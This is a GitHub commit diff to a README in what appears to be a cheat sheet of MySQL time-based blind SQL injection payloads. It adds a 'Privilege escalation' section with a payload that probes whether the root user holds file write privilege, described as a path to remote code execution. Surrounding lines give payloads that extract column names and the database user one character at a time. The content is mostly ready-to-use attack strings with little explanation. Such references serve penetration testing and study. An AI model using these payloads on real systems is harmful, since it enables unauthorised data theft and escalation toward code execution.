Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
@kleiton0x00
kleiton0x00 authored Sep 4, 2022
1 parent 552c249 commit 4f142ed
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions MySQL - Time Based SQLi/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -104,6 +104,8 @@ To search for the third character of the first column, you should increate the f
and if((select mid(column_name,1,1) from table_name limit 2,1)='a',sleep(5),1)--
```

# Privilege escalation

## Finding the db user
Find the first character of the user (if guessed then the request will be 5 seconds delayed):
```sql
Expand All @@ -114,3 +116,10 @@ Find the second character of the user... and so on:
```sql
and if(substring(user(),2,1)='d',SLEEP(5),1)--
```

## Enumerate user's permission

The following query will show if the user we found from the previous step, has writing permission, which can lead to RCE:
```sql
AND if (MID((SELECT file_priv FROM mysql.user WHERE user = 'root'),1,1) = 'Y', sleep(10), null)--
```

0 comments on commit 4f142ed

Please sign in to comment.